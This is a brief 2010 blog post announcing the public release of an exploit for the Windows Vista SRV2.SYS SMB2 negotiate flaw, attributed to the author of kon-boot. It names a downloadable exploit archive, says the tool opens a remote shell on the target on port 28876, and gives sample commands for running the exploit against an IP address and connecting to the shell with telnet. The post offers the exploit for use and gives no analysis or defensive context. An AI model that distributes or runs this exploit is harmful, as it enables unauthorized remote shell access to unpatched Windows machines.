Vista SRV2.SYS SMB Exploit Code

by admin

Wednesday, August 18th, 2010 at 7:40 am

Piotr, who made kon-boot, finally decided to release the Vista smb2 Negotiate ProcessID Function Table Dereference exploit code he’s been sitting on since last fall.
Download: smb2_exploit_release.zip
It should spawn a shell on TARGET_IP on port 28876
Sample usage
————
> smb2_exploit.exe 192.167.0.5 45 0
> telnet 192.167.0.5 28876
Your IP: 172.70.178.22
Hostname: 172.70.178.22

We love our country, but fear our government.